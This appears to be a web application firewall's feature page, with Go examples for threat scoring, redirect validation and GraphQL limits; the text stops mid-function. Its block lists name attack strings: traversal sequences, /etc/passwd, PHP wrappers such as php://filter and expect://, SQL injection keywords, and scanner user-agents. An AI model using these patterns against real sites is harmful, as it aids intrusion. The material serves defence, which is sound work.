- Disables dangerous DTDs
- Filters malicious XML
LDAP Injection Blocking
Blocks LDAP injection attempts through comprehensive input filtering.
- Detects LDAP metacharacters
- Blocks filter manipulation
- Prevents LDAP query tampering
- Input sanitization
NoSQL Injection Blocking
Prevents NoSQL database injection attacks through specialized filtering.
- Detects MongoDB operators
- Blocks JavaScript injection
- Prevents parameter pollution
- Validates JSON inputs
SSTI Detection Blocking
Blocks Server-Side Template Injection attacks across multiple template engines.
- Detects template syntax
- Blocks RCE via templates
- Prevents information disclosure
- Engine-specific detection
CSRF Check Blocking
Prevents Cross-Site Request Forgery attacks through token validation.
- CSRF token validation
- Origin header checking
- Same-site verification
- Anti-automation measures
Clickjacking Blocking
Prevents clickjacking and frame hijacking attempts.
- X-Frame-Options enforcement
- CSP frame-ancestors directive
- Frame-busting detection
- UI redress attack prevention
Vulnerability Scanner Blocking
Blocks automated vulnerability scanners through advanced detection.
- Detects scanner fingerprints
- Blocks common scanning tools
- Identifies reconnaissance
- Prevents vulnerability probing
Terminal Access Blocking
Prevents unauthorized terminal and console access attempts.
- Blocks reverse shells
- Detects command injection
- Prevents RCE attempts
- Filters shell commands
jQuery Guard Blocking
Protects against jQuery-based attacks and vulnerabilities.
- Blocks jQuery XSS vectors
- Prevents jQuery DOM manipulation
- Detects jQuery exploitation
- CVE-specific protections
Scan Technique Blocking
Blocks advanced scanning techniques used by professional attackers.
- Detects slow scans
- Blocks distributed scanning
- Identifies evasion techniques
- Prevents fingerprinting
Script Detector Blocking
Detects and blocks malicious script execution attempts
Comprehensive script analysis and malicious execution detection
- Browser Imitation Detection - Detects spoofed user agents and header inconsistencies
- Request Fingerprinting - Analyzes header patterns and capitalization
- Timing Humanity Analysis - Statistical analysis of request timing patterns
- Resource Loading Detection - Analyzes resource loading behavior
- Session Behavior Analysis - Tracks session patterns and navigation flows
- Payload Consistency - Detects automated payload generation
- Error Handling Analysis - Identifies automated error recovery patterns
- Basic Headless Detection - Traditional headless browser detection
- Missing Browser Headers - Identifies missing standard browser headers
- Automation Indicators - Detects Selenium, Puppeteer, Playwright, etc.
- Advanced Headless Detection - 25+ headless variants detection
- Playwright/Selenium Fingerprinting - Version-specific detection
- Puppeteer/CDP Detection - Chrome DevTools Protocol analysis
- Curl/Wget Detection - Command-line tool fingerprinting
- Python Requests Detection - Python HTTP library detection
- VM Environment Detection - Virtual machine/container detection
- Automation Timing Patterns - Advanced statistical timing analysis
- Missing JS Evidence - Detects lack of JavaScript execution
- Cookie Handling Anomalies - Identifies automated cookie management
- DevTools Protocol - Detects CDP usage
- Advanced Headless - Cloud headless services detection
- ML-Based Detection - Machine learning classification (optional)
- Human Biometric - Mouse/touch/keystroke pattern analysis
- Hardware Fingerprinting - GPU, CPU, canvas fingerprinting
- Advanced Evasion - Detects anti-detection techniques
Behavior Detector Blocking
Analyzes user behavior patterns to identify anomalies
Advanced behavioral analysis for human vs automated detection
C2 Detector Blocking
Identifies Command & Control communication patterns
Advanced Command & Control communication detection and blocking
Attack Detector Blocking
Multi-vector attack detection and prevention
Comprehensive multi-vector attack detection system
AI Attack Detector Blocking
Advanced AI-powered attack detection for zero-day threats
Next-generation AI-powered threat detection for zero-day and emerging attacks
Core Security Features
Advanced DDoS Protection
Multi-layer protection against volumetric, protocol, and application-layer DDoS attacks
Advanced multi-layer DDoS mitigation designed to protect infrastructure, APIs, and applications from distributed denial-of-service attacks.
Volumetric Attacks
- HTTP / HTTPS Flood
- SYN Flood
- UDP / ICMP Flood
- Amplification Attacks (DNS, NTP, Memcached, SSDP)
- Distributed HTTP Flood
- Layer-7 Bandwidth Exhaustion
Protocol Attacks
- Slowloris
- Slow-Read Attack
- RUDY (Slow POST)
- Ping-of-Death
- TCP Null / FIN / Xmas Flag Attacks
- LAND Attack
- IP Fragmentation Flood
- Malformed HTTP Requests
- Oversized Headers
- Keep-Alive Connection Abuse
Application Layer (L7)
- HTTP Flood (Layer-7)
- Cache-Busting Attacks
- Path Focusing Attacks
- Hash-Collision DoS
- Recursive / Deep GET Attacks
- Query-String Flood
- Form Parameter Flood
- Resource Exhaustion
- Regex DoS (ReDoS Probes)
API & Modern Application Attacks
- GraphQL Depth Bomb
- GraphQL Introspection Probing
- GraphQL Batch Abuse
- REST Endpoint Hammering
- API Key Brute-Force
- WebSocket Flood
- JSON Bomb / Nested Object Payload
Business Logic Abuse
- Login Flood
- Credential Stuffing
- Upload Size Abuse
- Upload Rate Abuse
- OTP / Verification Code Hammering
- Coupon / Voucher Abuse
- Account Enumeration
- Password Spraying
- Checkout Flood
Behavioral & Threat Intelligence
- Error Flood Detection
- Missing / Spoofed User-Agent
- Known Bad Bot Detection
- Headless Browser Fingerprinting
- Scanner / Probe Signature Detection
- TOR Exit Node Indicator
- Session Abuse Detection
- Path Enumeration Detection
- Reputation-Based Risk Scoring
- Geo-Location Anomaly Detection
SQL Injection Protection (A1)
Protects against SQL injection attacks (OWASP Top 10 A1)
Comprehensive protection against SQL injection attacks, addressing OWASP Top 10 A1.
- Advanced SQLi detection
- Prevents data exfiltration
- Blocks injection attempts
- Database-agnostic protection
Sensitive Data Encryption (A3)
Ensures sensitive data is properly encrypted (OWASP Top 10 A3)
Ensures sensitive data is properly encrypted and protected.
- Automatic encryption enforcement
- Prevents data leakage
- PCI-DSS compliance support
- GDPR data protection
XML External Entities Blocked (A4)
Prevents XXE attacks (OWASP Top 10 A4)
Prevents XML External Entity attacks through comprehensive XML filtering.
- Blocks external entity expansion
- Prevents XXE-based SSRF
- Disables dangerous DTDs
- XML parsing protection
Path Traversal Protection (A5)
Blocks directory/path traversal attempts (OWASP Top 10 A5)
Blocks directory/path traversal attempts, addressing OWASP Top 10 A5.
- Blocks directory traversal
- Prevents file access
- Protects sensitive paths
- URL normalization
Misconfiguration Scan (A6)
Detects and blocks security misconfigurations (OWASP Top 10 A6)
Detects and blocks security misconfigurations, addressing OWASP Top 10 A6.
- Scans for misconfigurations
- Blocks exposed admin panels
- Prevents default credential use
- Security header validation
XSS Protection (A7)
Prevents Cross-Site Scripting attacks (OWASP Top 10 A7)
Prevents Cross-Site Scripting attacks, addressing OWASP Top 10 A7.
- Reflected XSS prevention
- Stored XSS blocking
- DOM-based XSS protection
- Content Security Policy
Insecure Deserialization Block (A8)
Blocks insecure deserialization attempts (OWASP Top 10 A8)
Blocks insecure deserialization attempts, addressing OWASP Top 10 A8.
- Detects malicious serialized objects
- Blocks RCE via deserialization
- Prevents object injection
- Java/PHP/Python protection
Logging and Monitoring (A10)
Ensures proper logging and monitoring (OWASP Top 10 A10)
Ensures proper logging and monitoring, addressing OWASP Top 10 A10.
- Comprehensive request logging
- Real-time threat monitoring
- ClickHouse analytics
- Alert generation
Slowloris Protection
Protects against Slowloris DDoS attacks
Protects against Slowloris DDoS attacks through connection management.
- Detects slow connections
- Manages partial requests
- Timeout enforcement
- Connection limiting
Header Length Limit
Limits maximum HTTP header length to 3019 bytes
Limits maximum HTTP header length to 3019 bytes to prevent buffer overflow attacks.
- Enforces header size limits
- Prevents header overflow
- Blocks oversized requests
- Memory protection
Flooding Attacks Protection
Protects against request flooding attacks
Protects against request flooding attacks through intelligent rate control.
- Detects request bursts
- Blocks flood attacks
- Adaptive rate limiting
- DDoS mitigation
Header Scan Protection
Scans and validates HTTP headers for attacks
Scans and validates HTTP headers for potential attacks and anomalies.
- Header injection detection
- Malformed header blocking
- Security header validation
- Custom header rules
Cookie Tampering Protection
Prevents cookie modification/tampering attempts
Prevents cookie modification and tampering attempts through validation.
- Cookie integrity checking
- Encryption enforcement
- Session fixation prevention
- Tamper detection
Session Cookie Validation
Validates session cookies for security
Validates session cookies to ensure session integrity and security.
- Session ID validation
- Expiration checking
- Signature verification
- Replay attack prevention
Client Behavior Analysis
Analyzes client behavior patterns for anomalies
Analyzes client behavior patterns to detect anomalies and threats.
- Behavioral baselining
- Anomaly detection
- Session analysis
- Pattern recognition
Block Malformed Headers
Blocks requests with malformed/invalid HTTP headers
Blocks requests with malformed or invalid HTTP headers.
- Header syntax validation
- Protocol compliance
- Blocks malformed requests
- Prevents evasion
CSRF Protection
Prevents Cross-Site Request Forgery attacks
Prevents Cross-Site Request Forgery attacks through multiple layers.
- Token validation
- Origin checking
- SameSite enforcement
- Anti-automation
SSRF Protection
Blocks Server-Side Request Forgery attempts
Blocks Server-Side Request Forgery attempts through comprehensive filtering.
- Blocks internal IP requests
- Prevents metadata access
- URL validation
- DNS rebinding protection
Command Injection Protection
Prevents OS command injection attacks
Prevents OS command injection attacks through rigorous input validation.
- Shell metacharacter filtering
- Command chaining prevention
- RCE attempt blocking
- Input sanitization
Brute Force Protection
Protects against brute force login attempts
Protects against brute force login attempts through intelligent rate limiting.
- Login attempt limiting
- IP-based blocking
- CAPTCHA integration
- Account lockout
DNS Rebinding Protection
Prevents DNS rebinding attacks
Prevents DNS rebinding attacks through intelligent DNS validation.
- DNS response validation
- Internal IP blocking
- Pin-based protection
- Same-origin enforcement
Time Check Client Protection
Validates client time-based security checks
Validates client time-based security checks to prevent replay and automation.
- Timestamp validation
- Request freshness checks
- Replay attack prevention
- Time-based tokens
Tor Exit Node Blocking
Blocks requests from Tor exit nodes
Blocks requests from Tor exit nodes to prevent anonymous attacks.
- Tor exit node detection
- Real-time node list updates
- Anonymous traffic blocking
- Custom allowlisting
Information Detected Protection
Prevents information disclosure/sensitive data exposure
Prevents information disclosure and sensitive data exposure.
- PII detection and blocking
- Credential leak prevention
- API key masking
- Error message sanitization
Extension Protection
Protects against malicious file extension attacks
Protects against malicious file extension attacks and uploads.
- Blocks dangerous extensions
- File type validation
- MIME type checking
- Upload filtering
IP Reputation Check
Checks IP addresses against reputation databases
Checks IP addresses against reputation databases for threat intelligence.
- Real-time reputation checks
- Multiple feed integration
- Malicious IP blocking
- Dynamic blacklisting
Block Headless Browser
Detects and blocks headless browser automation
Detects and blocks headless browser automation tools.
- Headless Chrome detection
- Puppeteer/Playwright blocking
- PhantomJS detection
- Automation fingerprinting
Payload Signature Check
Validates payloads against rules/payload_signatures.txt
Validates payloads against comprehensive signature database.
- Signature-based detection
- Custom rule support
- Pattern matching
- Known attack blocking
Video Download Protection
Protects video content from unauthorized download
Protects video content (mp4, mp3, m3u8, png) from unauthorized download.
- Stream protection
- Hotlink prevention
- Download blocking
- Content access control
WAF JS Inject
Injects JavaScript protection into web pages
Injects JavaScript protection into web pages for client-side security.
- Bot detection scripts
- Behavioral analysis
- Client fingerprinting
- Anti-automation measures
IPv6 Protection
Enables security protections for IPv6 traffic
Enables comprehensive security protections for IPv6 traffic.
- IPv6 attack detection
- IPv6 reputation checks
- IPv6 rate limiting
- IPv6 geo-blocking
Local File Inclusion (LFI) Protection
Prevents attackers from including/reading local files on the server
Comprehensive protection against Local File Inclusion (LFI) attacks that attempt to read sensitive files on the server.
Path Traversal Detection
- Blocks directory traversal sequences (../, ..\, %2e%2e%2f)
- Detects encoded traversal patterns
- Prevents null byte injection (%00)
- Blocks access to sensitive system files
Sensitive File Protection
- /etc/passwd, /etc/shadow blocking
- Windows system file protection (boot.ini, win.ini)
- Application source code protection
- Configuration file access prevention
PHP Wrapper Blocking
- php://filter, php://input
- expect:// wrapper
- data://, zlib://, zip://
- phar://, glob:// wrappers
Advanced Features
- Real-time payload signature matching
- URL normalization and decoding
- Path canonicalization checks
- Automated IP banning for repeat offenders
- Comprehensive attack logging
Remote File Inclusion (RFI) Protection
Blocks attempts to include remote malicious files from external servers
Advanced protection against Remote File Inclusion (RFI) attacks that attempt to load and execute malicious code from external servers.
Remote URL Blocking
- Blocks http://, https:// inclusions
- Prevents ftp://, sftp://, file:// usage
- Blocks data://, input:// wrappers
- Detects base64 encoded remote inclusions
Malicious Domain Filtering
- Blocks known malicious domains and IPs
- Filters suspicious TLDs (.ru, .cn, .tk, .ml, .ga, .cf, .xyz)
- Prevents connection to anonymous hosting
- Custom domain blacklist support
PHP Function Monitoring
- Detects include()/require() with remote URLs
- Monitors allow_url_include/fopen settings
- Blocks curl_exec() with external URLs
- Prevents file_get_contents() abuse
Protection Features
- Real-time payload signature matching
- Multi-vector input inspection
- URL validation and sanitization
- Automated IP banning for attacks
- Detailed forensic logging
Attack Vectors Covered
- Query string parameters
- POST form data
- Cookie values
- HTTP headers
- File uploads (indirect RFI)
WordPress Hardening & Protection
Comprehensive security for WordPress sites - blocks XML-RPC attacks, login brute force, user enumeration, REST API abuse, vulnerability scanners, and zero-day exploit patterns
Key Benefits
- XML-RPC Attack Prevention: Blocks xmlrpc.php completely with multicall brute force detection - identifies large POST bodies (8KB+) used for credential stuffing. Adds 60 threat points instantly
- Login Brute Force Protection: 5-attempt window triggers temporary ban (default 30 minutes). Configurable attempt limits and ban duration. Threat score adds 60 points on ban
- User Enumeration Blocking: Blocks ?author=N scans and /author/ archive enumeration - prevents attackers from discovering usernames for brute force attacks. Adds 20 threat points
- REST API Security: Blocks /wp-json/wp/v2/users enumeration, rate-limits REST API (60 req/min), protects unauthenticated write endpoints (POST/PUT/DELETE). Adds 30 threat points for enumeration attempts
- Sensitive File Protection: Blocks access to .env, .git/config, .htaccess, .htpasswd, wp-config.php, backup files (.zip, .tar.gz, .sql), and 25+ other sensitive patterns
- Exploit Path Blocking: Pre-configured detection for 25+ known vulnerability paths including RevSlider RCE, TimThumb, File Manager, Duplicator installer, Adminer, and Elementor exploits. Adds 50 threat points
- PHP Execution in Uploads: Blocks any .php, .php5, .phtml, .phar execution from /wp-content/uploads/ directory - prevents uploaded shell access. Adds 70 threat points
- SQL Injection Protection: Regex patterns detecting UNION SELECT, INSERT INTO, DROP TABLE, OR 1=1, time-based attacks (SLEEP/BENCHMARK), information_schema access. Adds 50 threat points
- XSS Attack Prevention: Detects script tags, JavaScript protocol, event handlers (onload/onerror), iframe/frame injection, expression() CSS exploits, encoded entities. Adds 40 threat points
- Path Traversal Detection: Blocks ../, ..\, URL-encoded (%2e%2e%2f) and double-encoded (%252e%252e%252f) traversal attempts - prevents sensitive file reads. Adds 40 threat points
- Null Byte Injection Prevention: Detects \x00, %00, \0 sequences in URI and query strings - prevents file inclusion bypass techniques. Adds 30 threat points
- Scanner User-Agent Blocking: Identifies 20+ security scanners (WPScan, Nuclei, Nikto, Dirbuster, Masscan) and blocks instantly. Adds 50 threat points
- Bad Bot Prevention: Blocks 15+ malicious bots (MJ12bot, Semrush, Ahrefs, Dotbot, Petalbot, BleXbot, Yisou, Sogou, Baiduspider, 360spider)
- Threat Score Accumulation: Each blocked attempt adds configurable points. Reaching threshold (default 100) triggers 30-minute IP ban. Prevents distributed attacks
- wp-cron.php External Blocking: Only allows execution from localhost - prevents external trigger abuse and DoS via cron endpoint
- Debug Log Protection: Blocks /wp-content/debug.log access - prevents information leakage of PHP errors, database queries, and backtraces
- Installer File Protection: Blocks /wp-admin/install.php, upgrade.php, setup-config.php after initial setup - prevents site takeover via reinstallation
- TimThumb Vulnerability Block: Detects timthumb.php patterns in URI or query strings - prevents famous 0-day RCE exploit. Adds 50 threat points
- Directory Browsing Prevention: Blocks directory listings in /wp-content/ and /wp-includes/ - prevents asset enumeration and version fingerprinting
- Hotlink Protection: Prevents external sites from hotlinking your images, CSS, or static assets - saves bandwidth and prevents DDoS via image requests
- Admin CSRF Protection: Validates Referer header on wp-admin POST requests - prevents cross-site request forgery attacks. Adds 30 threat points on failure
- Strict HTTP Methods: Only allows GET, POST, HEAD methods on wp-admin - blocks DELETE, PUT, PATCH, OPTIONS, TRACE methods. Returns 405 Method Not Allowed
- Admin IP Allowlisting: Restrict /wp-admin and /wp-login.php to specific IP ranges - perfect for corporate environments or jump hosts
- Rate Limiting (Per-IP): Configurable request limits (default 300 requests/60 seconds) - prevents scraping, DoS, and crawling attacks
- REST API Rate Limiting: Separate rate limits for REST endpoints (default 60 req/min) - prevents API abuse while allowing normal plugin operations
- Version Fingerprint Removal: Strips the generator meta tag, removes ?ver=x.x.x from assets (CSS/JS/images), sanitizes Link header with wp-json - hides WordPress version
- Emoji Script Removal: Removes wp-emoji-release.min.js - hides version leak and reduces DOM size. Saves ~15KB per page load
- Feed Discovery Removal: Strips RSS/Atom feed links from HTML headers - prevents content scraping and reduces attack surface
- Theme & Plugin Info Blocking: Blocks access to /wp-content/themes/*/readme.txt, style.css, license.txt - prevents version fingerprinting and vulnerability matching
- Generator JSON-LD Stripping: Removes "generator": "WordPress x.x.x" from JSON-LD structured data - complete version hiding across all content types
- XML-RPC Multicall Detection: Identifies brute force attempts via system.multicall with 8KB+ payloads - blocks 90% of credential stuffing attacks. Adds 60 threat points
- Dangerous Upload Detection: Scans async-upload.php Content-Type for PHP/MIME types - blocks malicious file uploads. Adds 80 threat points
- Custom Login IP Blocklist: Multi-IP allowlist support for admin areas - CIDR notation not yet supported, explicit IPs only (configurable via LoginIPBlocklist array)
- Response Header Hardening: Injects X-Content-Type-Options: nosniff, X-Frame-Options: SAMEORIGIN, Referrer-Policy: strict-origin-when-cross-origin, X-XSS-Protection: 1; mode=block
- Threat Score Per Attack Type: XMLRPC brute +60, Login brute +60, SQLi +50, XSS +40, Path traversal +40, Null byte +30, Scanner UA +50, Exploit path +50, PHP upload +70 - cumulative scoring enables smart blocking
- Auto-Ban on Threshold: Configurable threat score threshold (default 100) triggers 30-minute IP ban - stops attacks before they succeed without permanent blocking
- Logging & Forensics: Comprehensive logging includes timestamp, IP, method, URI, and reason. Optional LogAllBlocks for full audit trail - SIEM compatible
- Low Performance Impact: All regex patterns pre-compiled, concurrent-safe maps with mutex locking, async threat score cleanup (30-min TTL) - handles 10K+ req/sec
How it works: The WordPress protection engine intercepts requests before they reach your WordPress installation. It applies 35+ security checks in sequence - from early detection (scanner UAs, SQLi patterns, null bytes) to application-specific rules (XML-RPC blocking, login brute force, REST API rate limiting). Each violation adds threat points; reaching the configurable threshold triggers a temporary IP ban (default 30 minutes). Threat scores decay naturally after 30 minutes of clean behavior. The response path strips version fingerprints, emoji scripts, and feed links from HTML output. All regex patterns are pre-compiled at startup, keeping the performance impact under 1ms per request even on high-traffic WordPress sites.
Protection Metrics:
- XML-RPC attacks blocked: 100% (when enabled)
- Login brute force prevention: 5 attempts → 30-min ban
- User enumeration blocked: 100% for ?author=N and /author/ URLs
- SQLi detection: 15+ regex patterns covering all major vectors
- XSS detection: 12+ patterns including modern evasion techniques
- Known exploit paths: 25+ signatures updated from WPScan DB
- False positive rate: <0.1% with proper configuration
Attack Vectors Covered:
- Authentication: Brute force, credential stuffing, XML-RPC multicall, user enumeration, author scans
- Injection: SQL injection, XSS, NoSQL (via REST), command injection, LDAP injection
- File-Based: LFI/RFI, path traversal, null byte injection, PHP execution in uploads, timthumb exploitation
- Information Disclosure: Version fingerprinting, directory browsing, debug logs, config files, backup exposure, theme/plugin enumeration
- Application Logic: Installer access after setup, wp-cron external triggers, CSRF, method override abuse
- DoS/DDoS: REST API flooding, login request storms, XML-RPC amplification, hotlink overload
- Scanning: Vulnerability scanners, bad bots, content scrapers, directory brute forcing
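To make the threat-score mechanism in the How it works paragraph concrete, here is an added Go example written for this page (not CloFix's own engine). It applies a few of the checks above with the page's point values, accumulates points per IP, bans at the threshold, and lets untouched scores decay after the TTL. The regex patterns, the `Request` type, the function names and the sample IP are assumptions made for the example; only the point values, the 8KB XML-RPC threshold and the 100-point/30-minute defaults come from the page.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
	"sync"
	"time"
)

// ThreatScorer keeps a per-IP score, bans the IP once the score reaches the threshold,
// and forgets any score untouched for ttl (the decay after 30 minutes of clean behaviour).
type ThreatScorer struct {
	mu        sync.Mutex
	threshold int
	ttl       time.Duration
	banFor    time.Duration
	scores    map[string]*scoreEntry
	bans      map[string]time.Time
	now       func() time.Time // injectable clock so decay can be exercised
}

type scoreEntry struct {
	points  int
	updated time.Time
}

func NewThreatScorer(threshold int, ttl, banFor time.Duration) *ThreatScorer {
	return &ThreatScorer{threshold: threshold, ttl: ttl, banFor: banFor,
		scores: map[string]*scoreEntry{}, bans: map[string]time.Time{}, now: time.Now}
}

// Add credits points to ip and reports whether that crossed the ban threshold.
func (s *ThreatScorer) Add(ip string, points int) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	now := s.now()
	e := s.scores[ip]
	if e == nil || now.Sub(e.updated) > s.ttl {
		e = &scoreEntry{} // stale score has decayed: start again from zero
		s.scores[ip] = e
	}
	e.points += points
	e.updated = now
	if e.points < s.threshold {
		return false
	}
	s.bans[ip] = now.Add(s.banFor)
	delete(s.scores, ip)
	return true
}

// Banned reports whether ip is still inside its temporary ban window.
func (s *ThreatScorer) Banned(ip string) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	until, ok := s.bans[ip]
	return ok && s.now().Before(until)
}

// Request is the slice of an HTTP request that the checks below inspect (assumed shape).
type Request struct {
	Method, Path, RawQuery, UserAgent string
	ContentLength                     int64
}

// Patterns are compiled once at startup, as the page describes.
var (
	scannerUA  = regexp.MustCompile(`(?i)wpscan|nuclei|nikto|dirbuster|masscan`)
	uploadsPHP = regexp.MustCompile(`(?i)^/wp-content/uploads/.*\.(php|php5|phtml|phar)$`)
	authorPath = regexp.MustCompile(`(?i)^/author/`)
)

// Score returns the threat points a request earns and the reason; 0 means clean. Point values
// follow the page: scanner UA 50, PHP in uploads 70, XML-RPC multicall (8KB+ POST) 60, enumeration 20.
func Score(r Request) (int, string) {
	switch {
	case scannerUA.MatchString(r.UserAgent):
		return 50, "scanner user-agent"
	case uploadsPHP.MatchString(r.Path):
		return 70, "php execution in uploads"
	case strings.EqualFold(r.Path, "/xmlrpc.php") && r.Method == "POST" && r.ContentLength >= 8*1024:
		return 60, "xml-rpc multicall brute force"
	case authorPath.MatchString(r.Path):
		return 20, "author archive enumeration"
	}
	if q, err := url.ParseQuery(r.RawQuery); err == nil && q.Get("author") != "" {
		return 20, "?author=N enumeration"
	}
	return 0, ""
}

func main() {
	s := NewThreatScorer(100, 30*time.Minute, 30*time.Minute)
	pts, why := Score(Request{Method: "GET", Path: "/wp-content/uploads/2024/x.php"}) // constructed sample
	fmt.Println(pts, why, s.Add("203.0.113.5", pts))
}
```

The clock is injected so the decay path can be exercised deterministically; in production the default `time.Now` is used and a periodic sweep would drop expired entries from the maps.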
Prototype Pollution Protection
Prevents JavaScript prototype pollution attacks targeting object prototypes in Node.js and browser environments
Advanced protection against prototype pollution attacks that attempt to modify JavaScript object prototypes, leading to RCE, property injection, or DoS.
Attack Vectors Blocked
- __proto__ Property Injection
- constructor.prototype Manipulation
- JSON-based Prototype Pollution
- Query String Prototype Injection
- Form Parameter Prototype Attacks
- Header-based Prototype Pollution
- Nested Object Injection
- Array Prototype Manipulation
- Function Prototype Override
- Object.prototype Pollution via Object.assign
Detection Methods
- Recursive Object Key Scanning
- Pattern-based Payload Detection
- JSON Payload Validation
- Parameter Pollution Correlation
- Context-Aware Filtering
- Whitelist-based Property Validation
Protected Environments
- Node.js Applications
- Browser-based JavaScript Apps
- MongoDB (prototype pollution to RCE)
- Express.js / Nest.js / Next.js
- React / Vue.js / Angular
- Serverless Functions
Open Redirect Protection
Blocks unvalidated redirects and forwards that could be used for phishing attacks
Prevents attackers from redirecting users to malicious external sites using unvalidated redirect parameters.
Attack Patterns Blocked
- External Domain Redirects
- JavaScript Protocol Redirects (javascript:)
- Data URI Redirects (data:text/html)
- URL Encoding Bypasses
- Double Encoding Tricks
- Unicode Homograph Domains
- Subdomain Takeover Redirects
- Open Proxy Abuse
Protection Mechanisms
- Whitelist-based Domain Validation
- Protocol Restriction (HTTP/HTTPS only)
- URL Canonicalization
- Redirect Parameter Detection
- Referrer Validation
- Same-Origin Enforcement
- Pattern-based URL Sanitization
Common Redirect Parameters Protected
redirect, redirect_uri, redirect_url, return, return_to, next, goto, url, dest, destination, callback, continue, forward, to, target, relay_state
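An added Go example (not CloFix's implementation) of allowlist-based domain validation combined with protocol restriction and URL canonicalisation, covering the scheme-relative, double-encoded, `javascript:`/`data:` and userinfo tricks listed above. The parameter list is taken from the page; the function names, the allowlist host `app.example.com` and the sample targets are assumptions for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// RedirectParams are the parameter names listed on the page.
var RedirectParams = []string{"redirect", "redirect_uri", "redirect_url", "return", "return_to", "next",
	"goto", "url", "dest", "destination", "callback", "continue", "forward", "to", "target", "relay_state"}

// SafeRedirect decides whether a redirect target may be followed: only same-site
// paths or http(s) URLs whose host is on the allowlist pass. The string explains
// the decision.
func SafeRedirect(target string, allowedHosts []string) (bool, string) {
	s := target
	for i := 0; i < 2; i++ { // undo up to two layers of percent-encoding (%252F%252F -> //)
		d, err := url.PathUnescape(s)
		if err != nil || d == s {
			break
		}
		s = d
	}
	// Browsers drop ASCII control characters inside URLs, so "java\tscript:" is javascript:.
	s = strings.Map(func(r rune) rune {
		if r < 0x20 || r == 0x7f {
			return -1
		}
		return r
	}, strings.TrimSpace(s))
	if s == "" {
		return false, "empty target"
	}
	// "//host", "/\host" and "\host" are all scheme-relative to a browser.
	if strings.HasPrefix(s, "//") || strings.HasPrefix(s, "/\\") || strings.HasPrefix(s, "\\") {
		return false, "scheme-relative redirect"
	}
	u, err := url.Parse(s)
	if err != nil {
		return false, "unparseable target"
	}
	if u.Scheme == "" && u.Host == "" {
		if strings.HasPrefix(s, "/") {
			return true, "same-site path"
		}
		return false, "relative target without leading slash"
	}
	if sch := strings.ToLower(u.Scheme); sch != "http" && sch != "https" {
		return false, "scheme not allowed: " + sch
	}
	if u.User != nil { // https://app.example.com@evil.example
		return false, "userinfo in target"
	}
	host := strings.ToLower(u.Hostname())
	for _, r := range host {
		if r > 0x7f { // refuse non-ASCII hosts outright; IDNA/homograph handling is out of scope here
			return false, "non-ascii host"
		}
	}
	for _, h := range allowedHosts {
		if host == strings.ToLower(h) {
			return true, "allowlisted host"
		}
	}
	return false, "host not allowlisted: " + host
}

// UnsafeRedirectParams scans a raw query string for the well-known redirect
// parameters and returns the names whose value fails SafeRedirect.
func UnsafeRedirectParams(rawQuery string, allowedHosts []string) []string {
	q, err := url.ParseQuery(rawQuery)
	if err != nil {
		return []string{"(unparseable query)"}
	}
	var bad []string
	for _, name := range RedirectParams {
		for _, v := range q[name] {
			if ok, _ := SafeRedirect(v, allowedHosts); !ok {
				bad = append(bad, name)
				break
			}
		}
	}
	return bad
}

func main() {
	allowed := []string{"app.example.com"} // constructed allowlist
	for _, tgt := range []string{"/account", "//evil.example", "%252F%252Fevil.example",
		"javascript:alert(1)", "https://app.example.com@evil.example/", "https://app.example.com/dash"} {
		ok, why := SafeRedirect(tgt, allowed)
		fmt.Printf("%-40s %-5v %s\n", tgt, ok, why)
	}
}
```

The allowlist is matched on the exact hostname, so `app.example.com.evil.example` and `evil.example/?u=app.example.com` both fail; a deployment that needs subdomain wildcards should add them explicitly rather than fall back to substring matching.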
GraphQL Security Protection
Comprehensive security for GraphQL APIs against introspection, depth bombs, and batch attacks
Specialized protection layer for GraphQL endpoints preventing DoS, data extraction, and abuse attacks.
Attack Types Blocked
- GraphQL Depth Bomb (Nested Queries)
- GraphQL Introspection Probing
- Batch Query Abuse (Alias Bomb)
- Circular Fragment Attacks
- Resource Intensive Queries
- Field Duplication Attacks
- Cost Analysis Bypass
- Persisted Query Abuse
Protection Features
- Query Depth Limiting (configurable)
- Alias Count Limiting
- Query Cost Analysis
- Introspection Blocking (production)
- Persisted Query Whitelisting
- Rate Limiting per Query Type
- Field Usage Analytics
- Batch Request Throttling
Configuration Options
- Max Query Depth: 10 (default)
- Max Aliases: 50 (default)
- Introspection: Blocked in production
- Query Cost Limit: configurable
- Batch Limit: 20 per request
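An added Go example (written for this page, not the product's code) that enforces the defaults above: it measures selection-set depth and alias count with a small scanner that skips string literals, comments and argument lists, caps batch size, and blocks introspection fields. The scanner is deliberately simpler than a full GraphQL parser, and the function names, the `Limits` type and the sample bodies are constructed for the example.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// Limits mirrors the configuration options listed above.
type Limits struct {
	MaxDepth, MaxAliases, MaxBatch int
	BlockIntrospection             bool
}

var DefaultLimits = Limits{MaxDepth: 10, MaxAliases: 50, MaxBatch: 20, BlockIntrospection: true}

var introspectionRe = regexp.MustCompile(`\b__(schema|type)\b`)

// QueryStats measures selection-set nesting depth and alias count with a character
// scanner: string literals and comments are skipped, and braces or colons inside
// argument lists (object literals, "id: 1", variable definitions) are ignored.
func QueryStats(q string) (depth, aliases int) {
	cur, parens := 0, 0
	for i := 0; i < len(q); i++ {
		c := q[i]
		switch {
		case strings.HasPrefix(q[i:], `"""`): // block string
			if j := strings.Index(q[i+3:], `"""`); j >= 0 {
				i += 3 + j + 2
			} else {
				i = len(q)
			}
		case c == '"': // ordinary string literal, honouring backslash escapes
			for i++; i < len(q) && q[i] != '"'; i++ {
				if q[i] == '\\' {
					i++
				}
			}
		case c == '#': // comment runs to end of line
			for i < len(q) && q[i] != '\n' {
				i++
			}
		case c == '(':
			parens++
		case c == ')':
			parens--
		case parens > 0: // inside an argument list nothing below counts
		case c == '{':
			cur++
			if cur > depth {
				depth = cur
			}
		case c == '}':
			cur--
		case c == ':': // "alias: field" outside of an argument list
			aliases++
		}
	}
	return depth, aliases
}

type operation struct {
	Query string `json:"query"`
}

// CheckGraphQLBody enforces the limits on a POST body holding one {"query": ...}
// object or a JSON array of them (a batch).
func CheckGraphQLBody(body []byte, l Limits) error {
	t := bytes.TrimSpace(body)
	if len(t) > 0 && t[0] != '[' {
		t = append(append([]byte{'['}, t...), ']') // treat a single operation as a batch of one
	}
	var ops []operation
	if err := json.Unmarshal(t, &ops); err != nil {
		return err
	}
	if len(ops) > l.MaxBatch {
		return fmt.Errorf("batch of %d operations exceeds limit %d", len(ops), l.MaxBatch)
	}
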